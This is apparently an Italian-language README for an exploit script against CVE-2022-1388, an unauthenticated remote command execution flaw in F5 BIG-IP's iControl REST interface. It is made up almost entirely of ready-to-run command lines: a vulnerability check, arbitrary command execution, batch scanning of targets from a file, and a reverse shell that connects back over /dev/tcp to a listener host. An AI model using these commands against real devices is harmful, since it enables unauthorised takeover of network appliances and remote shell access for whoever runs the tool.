
CVE-2022-1388 F5 BIG-IP iControl REST RCE
Questa vulnerabilità potrebbe consentire a un attaccante non autenticato con accesso di rete al sistema BIG-IP attraverso la porta di gestione e/o gli indirizzi IP propri di eseguire comandi arbitrari di sistema, creare o eliminare file, o disabilitare servizi.
Utilizzo base
python3 CVE_2022_1388.py

Verifica vulnerabilità
python3 CVE_2022_1388.py -v true -u https://192.168.17.200

Esecuzione comandi:
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

Scansione batch
python3 CVE_2022_1388.py -s true -f check.txt

Reverse Shell
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

